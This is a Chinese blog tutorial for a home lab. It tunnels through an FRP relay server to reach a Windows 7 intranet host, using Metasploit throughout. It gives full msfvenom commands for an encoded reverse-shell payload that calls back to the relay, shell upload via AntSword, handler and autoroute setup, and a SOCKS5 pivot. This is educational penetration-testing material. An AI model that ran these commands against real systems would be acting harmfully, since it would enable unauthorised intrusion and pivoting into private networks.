内网穿透第一期:FRP+MSF+Proxifier本地靶场环境搭建

!!!免责声明!!!

在法律允许的最大范围内,文档作者及关联方对未经授权操作,范围外操作,不可抵抗力不承担任何民事、行政或刑事责任!!!不得进行任何的非法渗透攻击,请遵守法律法规!!!

本文仅用于网络安全合法技术学习,所有操作均在本人物理机+本地虚拟机组成的封闭靶场环境中完成,全程无外网访问、无攻击行为,严禁将本文内容用于任何违反国家法律法规、侵犯他人权益的行为,违者后果自负。

平台审核严格,有些术语做了处理,望谅解

一、环境说明

  • Ubuntu服务器(frps服务端)

  • Kali攻击机(frpc客户端+MSF):IP  192.168.58.128

  • Win7靶机(木马+IIS网站):内网IP  10.10.10.10 ,IIS网站端口  1212

  • Win11攻击机(Proxifier):通过代理访问Win7内网

1.使用frp服务呢,就是因为攻击机和目标靶机不在同一个网段,不能相互访问,或者靶机有公网IP,kali没有,此时可以利用一个有公网IP的Ubuntu服务器作为跳板去访问靶机的内网

2.当然执行这所有操作之前呢要拿到对方的webshell

3.内网穿透链路流程:

flowchart TD subgraph 目标靶机 A[Win7 主机<br/>IIS 网站<br/>IP: 10.10.10.10:1212] end subgraph 转发中继层 B[Ubuntu 服务器<br/>frps 服务端<br/>端口: 8888<br/>TCP 隧道转发] end subgraph 攻击控制端 C[Kali Linux<br/>frpc 客户端 + MSF 监听器<br/>端口: 5566<br/>组件: Meterpreter 会话<br/>autoroute 路由 + S5转发 端口:1080] end subgraph 本地终端 D[Win11 物理机<br/>Proxifier S5 <br/>浏览器访问目标站点] end %% 链路连接与标注(完全沿用你要的流量走向) A -- 反向木马连接 --> B B -- 建立 frp TCP 隧道 --> C C -- 代理转发 --> D D -- 代理流量访问 --> A %% 样式美化(适配flowchart TD,无语法冲突) linkStyle 0 stroke:#ff6b6b,stroke-width:2px linkStyle 1 stroke:#4ecdc4,stroke-width:2px linkStyle 2 stroke:#45b7d1,stroke-width:2px linkStyle 3 stroke:#feca57,stroke-width:2px classDef target fill:#ffebee,stroke:#c62828,stroke-width:2px classDef relay fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px classDef attacker fill:#fff3e0,stroke:#ef6c00,stroke-width:2px classDef local fill:#f3e5f5,stroke:#8e24aa,stroke-width:2px class A target class B relay class C attacker class D local

二、frp 服务端(Ubuntu)配置

1. 配置文件frps.toml

[common]
# frp服务端监听端口,必须在防火墙放行
bind_port = 7000

# 下面的可以自行添加:
# 自定义强鉴权token,防止未授权接入
token = MySecureFrpToken@2025
# 开启TCP复用,提升转发稳定性
tcp_mux = true
# 心跳超时时间,避免断连
heartbeat_timeout = 30
# 允许客户端绑定任意端口(按需开启)
allow_ports = 1-65535

7051d9aba6aba38786117643523693aa

2. 防火墙放行端口(Ubuntu)

# 开的要放行端口,我的没开
sudo ufw allow 7000/tcp
sudo ufw allow 8888/tcp  # 木马转发端口
sudo ufw reload

3. 启动命令

# 赋予执行权限
chmod +x frps
# 运行服务
./frps -c frps.toml

# 可选
# 后台运行,关闭终端不中断
nohup ./frps -c frps.toml > frps.log 2>&1 &
# 查看运行状态
ps aux | grep frps

35353b4eb808a55cf9f9c8fa03731e5e

三、frp 客户端(Kali)配置

1. 配置文件frpc.toml

[common]
# Ubuntu服务器IP
server_addr = xxx.xxx.xxx.xxx 
# 服务端bind_port
server_port = 7000
# 和服务端完全一致的token(可选)
token = MySecureFrpToken@2025
# 开启TCP复用(可选)
tcp_mux = true
# 心跳间隔(可选)
heartbeat_interval = 10

# MSF木马转发隧道(核心)
[msf-tcp]
type = tcp
# 监听所有网卡,允许外部连接
local_ip = 0.0.0.0
# Kali本地MSF监听器端口
local_port = 5566
# Ubuntu服务器开放的外网端口
remote_port = 8888
# 保留真实源IP,解决MSF会话校验问题(可选)
stream_echo = true

9f9516cfa4f00345548fa2a66242a3b9

daa1a09fbd2934b4f65a04084c78587a

2. 启动命令

# 赋予执行权限
chmod +x frpc
# 运行客户端
./frpc -c frpc.toml
# 后台运行(可选)
nohup ./frpc -c frpc.toml > frpc.log 2>&1 &
# 查看运行状态(可选)
ps aux | grep frpc

4a60974aa0fb015f4340dcd8aeacdc93

四、MSF木马生成 + 监听器 + 代理配置(Kali)

1. 生成Win7 64位木马

  • 这里我用的是Metasploit Pro 5.0.0的WebGUI界面生成的

9beb9c885780321cd39fc3d11c2c0aa3

  • 也可以用以下命令生成

msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=xxx.xxx.xxx.xxx \  # 必须填Ubuntu服务器IP
LPORT=8888 \             # 必须填Ubuntu服务器8888端口
-e x64/xor_dynamic -i 5 \  # 基础免杀编码
-f exe -o payload.exe      # 整个语句是一行的!

2.用蚁剑上传到目标机执行

8ecef87594f3847062546d09d98c9baf

3.MSF监听器配置(稳定后台运行)

msfpro    #没有pro版的可以用msfconsole启动
use exploit/multi/handler
# 严格匹配木马payload架构
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# 监听所有网卡,允许frp转发流量
set LHOST 0.0.0.0
# 和frpc local_port一致
set LPORT 5566
# 会话断开不退出监听器(可选)
set ExitOnSession false
# 上线自动迁移进程,防止会话断(可选)
set AutoRunScript post/windows/manage/migrate
# 后台运行
run -j

9090fcf3b2780ddfa53abcf1bab89fc3

4. 内网路由 + S5配置(Kali 执行)

# 连接会话后,放在后台
background
# 1. 查看上线会话,确认session号(这里是session 3,按需修改)
sessions

# 2. 给Win7内网网段添加autoroute路由
use post/multi/manage/autoroute
set session 3
set subnet 10.10.10.0
set netmask 255.255.255.0
run

# 3. 启动S5
use auxiliary/server/s***s_p**xy
set version 5
set srvhost 0.0.0.0
set srvport 1080
# 后台运行,不占用终端
run -j

# 4. 验证路由(可选)
route print  # 确认10.10.10.0/24走session 3
jobs  # 确认job正常运行(可选)

image

ab4b8ff20a852e8cd117c79a2cd93ac5

五、Win7 IIS 网站启动(Win7 执行)

  • IIS默认自启动,有时会挂,启动W3SVC服务即可

# cmd 执行
net start http
net start was
net start w3svc
  • 这里只做演习,网站简陋

ec3e85e82cd2235052642463c93153b7

六、Proxifier完整配置(Win11)

1. 流量转发服务器配置

  • 打开 Proxifier → Profile → proxyServer → Add

| 配置项  | 填写内容                    |
| ---- | -------------------------    |
| 协议   | S**S V 5            |
| 地址   | 192.168.58.128(Kali 的 IP) |
| 端口   | 1080                       |
| 认证   | 无                         |

image

2. 代理规则配置

  • 把规则置顶,确保优先生效

image

3. 验证代理连通性

  • 点击check,有绿色条表示通过了

image

七、访问Win7内网

  • 通过后,Win11流量自动走 Kali,用本地浏览器直接访问http://10.10.10.10:1212即可

608f60021ac5b1600a427e43141912b3

  • 可以看到成功访问了,Win7内网 10.10.10.10 被打穿了!

  • 后面呢,可以做收集系统信息,权限提升,账号密码枚举,权限维持,这些后面会陆续出文章讲解

  • 以上所有操作都在靶机进行,请勿用于任何非法用途!

!!!免责声明!!!

在法律允许的最大范围内,文档作者及关联方对未经授权操作,范围外操作,不可抵抗力不承担任何民事、行政或刑事责任!!!不得进行任何的非法渗透攻击,请遵守法律法规!!!

!!!免责声明!!!

在法律允许的最大范围内,文档作者及关联方对未经授权操作,范围外操作,不可抵抗力不承担任何民事、行政或刑事责任!!!不得进行任何的非法渗透攻击,请遵守法律法规!!!

!!!免责声明!!!

在法律允许的最大范围内,文档作者及关联方对未经授权操作,范围外操作,不可抵抗力不承担任何民事、行政或刑事责任!!!不得进行任何的非法渗透攻击,请遵守法律法规!!!

posted @ 2026-04-01 23:21  在晴天搁浅  阅读(37)  评论(0)    收藏  举报
::before

12:17:21 AM

::after